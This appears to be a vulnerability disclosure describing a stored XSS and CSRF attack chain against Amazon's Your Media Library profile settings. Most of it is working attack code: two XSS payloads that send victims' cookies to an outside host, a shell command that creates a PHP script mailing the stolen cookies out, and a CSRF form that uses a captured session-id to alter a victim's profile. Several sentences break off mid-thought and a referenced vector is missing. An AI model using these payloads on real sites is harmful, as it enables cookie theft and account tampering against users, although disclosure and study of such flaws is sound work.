The Amazon YourMediaLibrary is vulnerable to stored
XSS Vulnerability, the attacker can redirect an user to his profile page and steal user-cookie to perform an
Your Media Library is a secure location from which you retrieve all digital products, including eDocs, Amazon Upgrades, the free electronic user manuals that come with some products, and free music files that are available with select CDs.
Insert this vector into
In my own words inputs:
Since many values of cookie were setted like HttpOnly, the malicious user can’t hijack the session but anyway It can execute an arbiratry operations through an
CSRF Attack knowning the
session-id saved in the
user-cookie (however the session-id does the function of security-token):
Generate a base html payload to steal user cookie:
<script> location.href='//land-domain.com/steal.php?cookie='+document.cookie; </script>
Or if you want a payload without redirect:
<img style='display:none' src=x onerror=this.src='//land-domain.com/?cookie='+document.cookie>
Attacker adds this double encoded vector into his interests in settings profile page:
Then It redirects the user to his medialibrary profile page to steal and store cookie by remote malicious file (basic steal.php)
$ echo " <?php mail('firstname.lastname@example.org', 'Cookie', $_GET['cookie']); header('Location: '.$_SERVER['HTTP_REFERER']); ?>" > /var/www/land-domain.com/steal.php
Now he’s got a ‘session-id=180-0536506-4528302′ of user (that is not secured).
With this simple CSRF page:
<html> <head> <title>Amazon CSRF</title> </haed> <body> <form method="POST" action="https://www.amazon.com/gp/ays/ajax/setProfile.html"> <input type="hidden" name="key" value="inMyOwnWords"> <input type="hidden" name="value" value="injected"> <input type="hidden" name="sessionId" value="180-0536506-4528302"> </form> </body> </html>
The malicious user can change all profile settings of user.